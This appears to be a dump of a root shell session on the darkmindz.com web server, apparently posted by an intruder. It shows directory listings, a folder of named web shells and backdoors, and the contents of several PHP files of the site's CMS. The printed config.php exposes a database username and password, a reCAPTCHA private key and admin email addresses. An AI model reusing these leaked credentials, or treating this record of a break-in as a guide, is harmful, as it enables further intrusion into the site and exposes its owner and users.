./domains/darkmindz.com/public_html
-rw-r-----  1 romeo mail    34 Apr 19 16:26 .shadow
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
4.0K	Maildir/tmp
68M	Maildir/new
4.0K	Maildir/cur
68M	Maildir/
68M	total
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
root@server2:/home/romeo[root@server2 romeo]# cd domains
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
-la
total 40
drwx--x--x  7 romeo romeo  4096 Apr 22 15:53 .
drwx--x--x  4 romeo romeo  4096 Dec 23 14:31 ..
drwxr-xr-x  2 romeo romeo  4096 Dec 22 09:57 .htpasswd
drwxr-xr-x  2 root  root   4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo  4096 Dec 22 09:57 public_ftp
drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 public_html
drwxr-xr-x  2 root  root   4096 May  1 00:10 stats
-rw-r--r--  1 romeo romeo 12151 Feb  9 09:01 view_topic.php
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
public_html/
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46487316 May 23 04:07 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la scripts/
total 476
drwxr-xr-x  2 romeo romeo   4096 Feb  7 13:38 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   4770 Jan 13 12:11 builder.js
-rw-r--r--  1 romeo romeo    588 Jan 13 12:11 cli.js
-rw-r--r--  1 romeo romeo  35851 Jan 13 12:12 controls.js
-rw-r--r--  1 romeo romeo  35253 Jan 13 12:11 dragdrop.js
-rw-r--r--  1 romeo romeo  38986 Jan 13 12:12 effects.js
-rw-r--r--  1 romeo romeo   8663 Feb 14 12:40 functions.js
-rw-r--r--  1 romeo romeo   6897 Jan 13 12:11 growl.js
-rw-r--r--  1 romeo romeo  63854 Jan 13 12:11 lightwindow.js
-rw-r--r--  1 romeo romeo  52665 Jan 13 12:12 php.min.js
-rw-r--r--  1 romeo romeo   1457 Jan 13 12:11 pm.js
-rw-r--r--  1 romeo romeo   1637 Jan 13 12:11 pngfix.js
-rw-r--r--  1 romeo romeo   3261 Jan 13 12:11 proto.menu.js
-rw-r--r--  1 romeo romeo 130380 Jan 13 12:12 prototype.js
-rw-r--r--  1 romeo romeo   2733 Jan 13 12:11 register.js
-rw-r--r--  1 romeo romeo   2711 Jan 13 12:11 scriptaculous.js
-rw-r--r--  1 romeo romeo    121 Jan 13 12:11 shoutbox.js
-rw-r--r--  1 romeo romeo  10296 Jan 13 12:12 slider.js
-rw-r--r--  1 romeo romeo   1920 Jan 13 12:12 sound.js
-rw-r--r--  1 romeo romeo  20197 Jan 13 12:12 unittest.js
-rw-r--r--  1 romeo romeo   6145 Feb 14 12:40 user.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la shell/
total 1564
drwxr-xr-x  2 root  root    4096 May 20 14:30 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   1297 Feb 16 21:05 ajan.txt
-rw-r--r--  1 romeo romeo  44210 Feb 16 21:06 b64.txt
-rw-r--r--  1 romeo romeo    140 Feb 16 21:06 backdoor.txt
-rw-r--r--  1 romeo romeo  11141 Feb 16 21:06 c101.txt
-rw-r--r--  1 romeo romeo   1468 Feb 16 21:06 cmd.txt
-rw-r--r--  1 romeo romeo  18519 Feb 16 21:06 codeanalyzer.txt
-rw-r--r--  1 romeo romeo 114861 Feb 16 21:06 constance.txt
-rw-r--r--  1 romeo romeo  40682 Feb 16 21:06 CrystalShell v.1.txt
-rw-r--r--  1 romeo romeo  83029 Feb 16 21:06 CyberSpy5.txt
-rw-r--r--  1 romeo romeo  43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
-rw-r--r--  1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
-rw-r--r--  1 romeo romeo  39433 Feb 16 21:06 eko.txt
-rw-r--r--  1 romeo romeo  38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
-rw-r--r--  1 romeo romeo  24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
PRiV8.txt
-rw-r--r--  1 romeo romeo   2089 Feb 16 21:06 imageshell.JPG
-rw-r--r--  1 romeo romeo   1768 Feb 16 21:06 index.php
-rw-r--r--  1 romeo romeo  17440 Feb 16 21:06 kscript.txt
-rw-r--r--  1 romeo romeo   2342 Feb 16 21:06 l0ger.txt
-rw-r--r--  1 romeo romeo   1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
-rw-r--r--  1 romeo romeo  33796 Feb 16 21:06 Mysql interface v1.0.txt
-rw-r--r--  1 romeo romeo  34398 Feb 16 21:06 mysql.txt
-rw-r--r--  1 romeo romeo  38856 Feb 16 21:06 ntdaddy.txt
-rw-r--r--  1 romeo romeo 124953 Feb 16 21:06 r57.txt
-rw-r--r--  1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
-rw-r--r--  1 romeo romeo   7002 Feb 16 21:06 steg.txt
-rw-r--r--  1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
-rw-r--r--  1 romeo romeo  70402 Feb 16 21:06 webadmin.txt
-rw-r--r--  1 romeo romeo   5057 Feb 16 21:06 WinX Shell.txt
-rw-r--r--  1 romeo romeo   2455 Feb 16 21:06 Worse Linux Shell.txt
-rw-r--r--  1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
-rw-r--r--  1 romeo romeo  10418 Feb 16 21:06 XSSscan.py.txt
-rw-r--r--  1 romeo romeo  10269 Feb 16 21:06 xx.txt
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# #ELEET
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488303 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cat test.php
<?php
/*======================================================================*\
 |		Cybershade CMS - Your CMS, Your Way			|
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'forum');
$cms_root = '';
$page_name = '';
include "core/core.php";

$breadcrumb = array(
			);

include "core/page_header.php";

mail("crawleruk@gmail.com", 'test', "mail() sent msg");
mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
msg');

include "core/page_footer.php";
?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488756 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# less ucp.php
<?php
/*======================================================================*\
 |		Cybershade CMS - Your CMS, Your Way			|
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'ucp');
$cms_root = '';
$page_name = 'Profile';
include $cms_root."core/core.php";
if (!$_user->is_online){redirect("/".root()."index.php");}

$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
$switch = isset($_GET['action']) ? $_GET['action'] : '';

$uid = $config['global']['user']['id'];
if((int)isset($_GET['uid']) &&
$_user->check_permissions($config['global']['user
']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
    $uid = (int)$_GET['uid'];
}else{
    $uid = $config['global']['user']['id'];
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 .
drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   731 Jan 13 07:34 admin.js
-rw-r--r--  1 romeo romeo 27395 Feb 18 09:08 base_functions.php
-rw-r--r--  1 romeo romeo  9098 Feb 21 10:50 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb  1 08:55 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 13:29 classes
-rw-r--r--  1 romeo romeo  1436 Feb  2 08:33 cli.php
-rw-r--r--  1 romeo romeo  2848 Feb  8 08:46 config.php
-rw-r--r--  1 romeo romeo 23810 Apr 19 16:45 core.php
-rw-r--r--  1 romeo romeo  4518 Feb  1 08:55 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 err
-rw-r--r--  1 romeo romeo   236 Feb  2 08:33 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 functions
-rw-r--r--  1 romeo romeo  1181 Feb  2 08:33 key.php
-rw-r--r--  1 romeo romeo  6903 Feb  2 08:33 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 mint
-rw-r--r--  1 romeo romeo  3054 Feb 14 06:17 page_footer.php
-rw-r--r--  1 romeo romeo  5935 Feb 14 06:17 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb  2 08:33 recaptchalib.php
-rw-r--r--  1 romeo romeo  6658 Apr 26 07:51 security.php
-rw-r--r--  1 romeo romeo  2021 Feb  2 08:33 usertracker.php
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat config.php
<?php
//Cybershade.Org

//Database Stuff
$config['db']['host']					= 'localhost';
$config['db']['username']				= 'romeo_romeo';
$config['db']['password']				= 'swU55ath';
$config['db']['database']				= 'romeo_DMZ_CS';
$config['db']['prefix'] 				= 'dmz_';
$config['db']['shrfix'] 				= 'shr_'; //the prefix
for the shared tables
$config['db']['ckefix'] 		= 'CMS_'; //the cookie prefix
$config['db']['ckeauth']		= '0.7.0'; //the cookie auth key //this
is also a good way to invalidate the autologins on cms update
$config['site']['working_dir']			= '';

//config vars for if we loose the DB
$config['cms']['name']			= 'DarkMindZ';
$config['cms']['version']		= '_DDoS';
$config['cms']['debug'] 		= "0";
$config['site']['title']		= 'CyberShade CMS';
$config['site']['theme']		= 'cs';
$config['site']['language']		= 'en';
$config['site']['keywords']		= '';
$config['site']['description']		= '';
$config['site']['max_login_tries']	= "5";
$config['site']['time'] 		= 'jS F h:ia';
$config['site']['template_override']	= "1";
$config['site']['auto_login']		= "1";
$config['site']['ips_max_before_ban']	= "5";

$config['site']['hourly_time']			= 3600; //1 Hour
$config['site']['daily_time']			= (3600*24); //1 Day
$config['site']['weekly_time']			= (3600*24*7); //1 Week

$config['site']['default_module']	= 'core';
$config['site']['closed']		= "0";
$config['site']['admin_email']		= 'romeo.haxxor@gmail.com';
$config['site']['usernamechange']	= "0";
$config['site']['fc_update']		= "1220620615";
$config['site']['paginate']		= "8";
$config['site']['news_cat']		= "2";
$config['site']['captcha_pub']		=
'6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
$config['site']['captcha_priv'] 	=
'6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
$config['site']['announcement'] 	= 'No Current Announcements, This may
be because the Database has gone down.';
$config['rss']['global_limit']		= "15";
$config['site']['max_whitelist']	= "5";
$config['movemod']['move_enabled']	= "0";
$config['site']['quick_replys'] 	= "0";
$config['site']['users_online'] 	= "0";
$config['site']['guests_online']	= "0";

//Statistics shit fort the same reason (Only used when the DB is inactive,
setting it to time() + 9999999 means the cron will never be run)
$config['statistics']['hourly_cron']	= "9999999999999";
$config['statistics']['daily_cron']		= "9999999999999";
$config['statistics']['weekly_cron']	= "9999999999999";
$config['statistics']['total_members']	= 'N/A, (DDoS)';
$config['statistics']['last_user_user'] = 'N/A, (DDoS)';
$config['statistics']['last_user_id']	= 'N/A, (DDoS)';
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat core.php
<?php
/*======================================================================*\
 |		Cybershade CMS - Your CMS, Your Way.			|
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}

error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();

//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;

//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");

/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//The config files
require($cms_root."core/config.php");

/*this is the ultimate cache-er xD, k so basically u got
 *    the var below which "allows" the static cacher through
 */

#$allow = true;

//this little switch decided what should be auto cache'd
/*switch(CMS_MENU){
    case 'forum':   $allow = false;	break;
    case 'admin':   $allow = false;	break;
    case 'ucp':     $allow = false;	break;
    case 'login':   $allow = false;	break;
    case 'main':    $allow = false;	break;
    case 'pm':	    $allow = false;	break;
    default:	    $allow = true;	break;
}

if($allow){
    // Get the modification date of this PHP file
    $timestamps = array(@getlastmod());

    // The latest of these modification dates is our real Last-Modified date
    $timestamp = max($timestamps);

    // Note that this is not a RFC 822 date (the tz is always GMT)
    $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";

    // Check if the client has the same page cached
    if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
	($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
	header("HTTP/1.1 304 Not Modified");
	exit();
    }
    // Inform the user what is our last modification date
    else {
	header("Last-Modified: " . $tsstring);
    }
}*/

//The class files
require($cms_root."core/classes/class.sql.php");
if(!SMODE)require($cms_root."core/classes/class.login.php");
if(!SMODE)require($cms_root."core/classes/class.user.php");
if(!SMODE)require($cms_root."core/classes/class.form.php");
if(!SMODE)require($cms_root."core/classes/class.time.php");
require($cms_root."core/classes/class.nbbc.php");
require($cms_root."core/classes/class.tpl.php");
if(!SMODE)require($cms_root."core/classes/class.cache.php");
require($cms_root."core/classes/class.geshi.php");

//The base functions
require($cms_root."core/base_functions.php");

/////////////////////////////////////////////////////////////////////////////
//--Sort out the cached config stuff---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$config_db = array();
//check see if the config file exists, if not then just create a blank config
variable
if(file_exists($cms_root."cache/cache_config.php")){ include
$cms_root."cache/cache_config.php"; }

//If the config_db is not null, cached.. then use it.
if($config_db !== NULL){
    foreach($config_db as $array){
	$config[$array['array']][$array['var']] = $array['value'];
    }
    unset($array);
}

if(isset($_GET['_site'])){
    $a=(isset($_GET['_site']) ? $_GET['_site'] :
(isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
$config['db']['prefix']));
    switch($a){
	case 'dmz':
	    $_SESSION['site']['mode'] = 'dmz_';
	break;
	case 'cs':
	    $_SESSION['site']['mode'] = 'cs_';
	break;
	default:
    }
}
if(isset($_SESSION['site']['mode']))
    $config['db']['prefix'] = $_SESSION['site']['mode'];

/////////////////////////////////////////////////////////////////////////////
//--Define new instances of required classes-------------------------------//
/////////////////////////////////////////////////////////////////////////////
//start the sql
$_sql = new sql(true);
$_sql->config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }


//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;

//start the form class
$_form = new form;

//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;


//start the login
$_login = new login((isset($config['site']['autologin']) ? true : false));
$_login->config = $config;
$_login->sql = $_sql;
$_login->form = $_form;
$_login->sess = $_sess;
$_login->user = $_user;
$_user->login = $_login;

//require($cms_root."core/key.php");

//start the time class
$_time = new time;
$_time->config = $config;

//start the bbcode class
$_bbcode = new bbcode;
$_bbcode->SetDebug(true);
$_bbcode->SetDetectURLs(false);
$_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
/></a>');
$_bbcode->ClearSmileys();
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
include($cms_root."core/bbcode_tags.php");

$_bbcode->user = $_user;
$_user->bbcode = $_bbcode;

//start the cache && template classes
$_cache_path = $cms_root."cache/";
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
$_cache_ = (is_writable($_cache_path) ? true : false);
$_cache = new Cache($_sql, $_cache_path, $_cache_);
$_cache->config = $config['db'];

//regenerate the site cache
